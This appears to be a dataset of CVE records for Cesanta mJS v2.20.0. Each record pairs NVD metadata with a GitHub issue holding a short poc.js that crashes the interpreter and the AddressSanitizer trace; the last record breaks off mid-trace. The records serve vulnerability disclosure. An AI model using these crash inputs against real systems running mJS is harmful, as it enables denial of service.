cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringlengths
39
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
58
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
39
62
issue_github_id
int64
128M
2.09B
issue_number
int64
1
122k
CVE-2021-46530
2022-01-27T21:15:10.380
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_execute at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/206" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/206
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { let arr = [1]; arr.splice((arr.splice(0, 17)= [1])= [1])= [1] } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==23867==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55dcd2425950 bp 0x000000000000 sp 0x7fff558e7b00 T0) ==23867==The signal is caused by a READ memory access. ==23867==Hint: address points to the zero page. #0 0x55dcd242594f in mjs_execute src/mjs_exec.c:823 #1 0x55dcd2430a05 in mjs_exec_internal src/mjs_exec.c:1073 #2 0x55dcd2430a05 in mjs_exec_file src/mjs_exec.c:1096 #3 0x55dcd23ed909 in main src/mjs_main.c:47 #4 0x7f63f4c54b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55dcd23ee449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_exec.c:823 in mjs_execute ``` Credits: Found by OWL337 team.
SEGV src/mjs_exec.c:823 in mjs_execute
https://api.github.com/repos/cesanta/mjs/issues/206/comments
0
2021-12-31T07:41:02Z
2022-01-12T02:20:23Z
https://github.com/cesanta/mjs/issues/206
1,091,459,702
206
CVE-2021-46531
2022-01-27T21:15:10.423
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x8d28e. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/211" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/211
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript JSON.parse--("0xA") !== JSON.parse("0xA") ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==2607==ERROR: AddressSanitizer: SEGV on unknown address 0x55f3104c021c (pc 0x55f3104c028f bp 0x000000000043 sp 0x7ffcbbf96e98 T0) ==2607==The signal is caused by a WRITE memory access. #0 0x55f3104c028e (/usr/local/bin/mjs+0x8d28e) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x8d28e) ==2607==ABORTING ```
SEGV (/usr/local/bin/mjs+0x8d28e)
https://api.github.com/repos/cesanta/mjs/issues/211/comments
0
2021-12-31T07:48:04Z
2021-12-31T07:48:04Z
https://github.com/cesanta/mjs/issues/211
1,091,461,538
211
CVE-2021-46532
2022-01-27T21:15:10.467
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via exec_expr at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/203" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/203
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case1 <details> <summary>poc.js</summary> <pre><code> ```javascript [""]isNaN[NaN] = 2; ``` </code></pre> </details> ###### Test case2 <details> <summary>poc.js</summary> <pre><code> ```javascript function T(o) { for (let i = 0; i < 2; i++) JSON.stringify[i] =-undefined; o.length = undefined; return o; } function JSEtest(a) { T(a); undefined + T(0) + T(0); for(let i = 0; i < 10000000; i++) {} } JSEtest({}); ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= =====ERROR: AddressSanitizer: SEGV on unknown address 0x560130588150 (pc 0x56013054b8c1 bp 0xfff2560130588150 sp 0x7ffde3a287f0 T0) =====The signal is caused by a WRITE memory access. #0 0x56013054b8c0 in exec_expr src/mjs_exec.c:347 #1 0x56013054b8c0 in mjs_execute src/mjs_exec.c:888 #2 0x560130550a05 in mjs_exec_internal src/mjs_exec.c:1073 #3 0x560130550a05 in mjs_exec_file src/mjs_exec.c:1096 #4 0x56013050d909 in main src/mjs_main.c:47 #5 0x7f497ee31b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x56013050e449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_exec.c:347 in exec_expr ``` Credits: Found by OWL337 team.
SEGV src/mjs_exec.c:347 in exec_expr
https://api.github.com/repos/cesanta/mjs/issues/203/comments
0
2021-12-31T07:34:16Z
2022-01-12T02:20:11Z
https://github.com/cesanta/mjs/issues/203
1,091,457,962
203
CVE-2021-46534
2022-01-27T21:15:10.510
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via getprop_builtin_foreign at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/204" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/204
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript if ((false && x) !== (isNaN[2147483648])) { (false && x)('#1'); } ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= =====ERROR: AddressSanitizer: SEGV on unknown address 0x55b2aa0e3340 (pc 0x55b32a04691c bp 0x000000000003 sp 0x7fffcfaa75c0 T0) =====The signal is caused by a READ memory access. #0 0x55b32a04691b in getprop_builtin_foreign src/mjs_exec.c:501 #1 0x55b32a04691b in getprop_builtin src/mjs_exec.c:538 #2 0x55b32a04691b in mjs_execute src/mjs_exec.c:690 #3 0x55b32a04ea05 in mjs_exec_internal src/mjs_exec.c:1073 #4 0x55b32a04ea05 in mjs_exec_file src/mjs_exec.c:1096 #5 0x55b32a00b909 in main src/mjs_main.c:47 #6 0x7f5bfdabeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x55b32a00c449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_exec.c:501 in getprop_builtin_foreign ```
SEGV src/mjs_exec.c:501 in getprop_builtin_foreign
https://api.github.com/repos/cesanta/mjs/issues/204/comments
0
2021-12-31T07:36:20Z
2021-12-31T07:36:20Z
https://github.com/cesanta/mjs/issues/204
1,091,458,500
204
CVE-2021-46535
2022-01-27T21:15:10.553
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0xe533e. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/209
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) Version: ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript isNaN(--isNaN) !== true if (isNaN(-function () { return 1 }) !== true) { $ERROR('#Error' + (-function () { return 1 })); } ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==36318==ERROR: AddressSanitizer: SEGV on unknown address 0x559b7cd412cc (pc 0x559b7cd4133f bp 0x000000000043 sp 0x7fff0319d2b8 T0) ==36318==The signal is caused by a WRITE memory access. #0 0x559b7cd4133e (/usr/local/bin/mjs+0xe533e) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0xe533e) ==36318==ABORTING ``` Credits: Found by OWL337 team.
SEGV (/usr/local/bin/mjs+0xe533e)
https://api.github.com/repos/cesanta/mjs/issues/209/comments
0
2021-12-31T07:45:23Z
2022-01-12T02:20:36Z
https://github.com/cesanta/mjs/issues/209
1,091,460,822
209
CVE-2021-46537
2022-01-27T21:15:10.597
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x9a30e. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/212" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/212
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function Aply() { return Object.create.apply({}, [Object]); } function JSEtest(i) { return Aply(i, 1, 2, 3); } JSEtest(89)[Object.create--] JSEtest(0.2) ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==87532==ERROR: AddressSanitizer: SEGV on unknown address 0x55d1329c929c (pc 0x55d1329c930f bp 0x615000000080 sp 0x7ffe4957a058 T0) ==87532==The signal is caused by a WRITE memory access. #0 0x55d1329c930e (/usr/local/bin/mjs+0x9a30e) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x9a30e) ==87532==ABORTING ```
SEGV (/usr/local/bin/mjs+0x9a30e)
https://api.github.com/repos/cesanta/mjs/issues/212/comments
0
2021-12-31T07:49:30Z
2021-12-31T07:49:30Z
https://github.com/cesanta/mjs/issues/212
1,091,461,914
212
CVE-2021-46538
2022-01-27T21:15:10.643
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_compact_strings at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/216
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case ```javascript (function () { ((function f(a) { if (a > 0) { if ('#1.1: -0 - -0 === 0. Actual: '((JSON.stringify(gc('#1.1: -0 - -0 === 0. Ac\ual: '))) !== (gc('#1.1: -0 - -0 === 0. Actual: '))('#1.1: -0 - -0 === 0. Actual: ' !== f(a - 1)))) { f(a - 1) } } })(6)) })() ``` ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==50070==ERROR: AddressSanitizer: SEGV on unknown address 0x3a60d0000001 (pc 0x5588da606950 bp 0x615000000080 sp 0x7ffef6409930 T0) ==50070==The signal is caused by a READ memory access. #0 0x5588da60694f in gc_compact_strings src/mjs_gc.c:406 #1 0x5588da6087d7 in mjs_gc src/mjs_gc.c:500 #2 0x5588da608ec2 in maybe_gc src/mjs_gc.c:446 #3 0x5588da5d2d67 in mjs_execute src/mjs_exec.c:578 #4 0x5588da5e0a05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x5588da5e0a05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x5588da59d909 in main src/mjs_main.c:47 #7 0x7fe819cbcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x5588da59e449 in _start (/usr/local/bin/mjs+0xe449) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_gc.c:406 in gc_compact_strings ==50070==ABORTING ``` Credits: Found by OWL337 team.
SEGV src/mjs_gc.c:406 in gc_compact_strings
https://api.github.com/repos/cesanta/mjs/issues/216/comments
0
2021-12-31T07:56:05Z
2022-01-12T02:21:15Z
https://github.com/cesanta/mjs/issues/216
1,091,463,608
216
CVE-2021-46539
2022-01-27T21:15:10.687
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x45a1f. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/217" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/217
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { let arr = [1]; [[arr.push(0, 17)].push([arr.push(0, 17)].push(0, 17))]; } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==126169==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fb20926da20 bp 0x000000000000 sp 0x7ffc6083ff90 T0) ==126169==The signal is caused by a READ memory access. ==126169==Hint: address points to the zero page. #0 0x7fb20926da1f (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) #1 0x5619439c70b3 in cstr_to_ulong src/mjs_string.c:232 #2 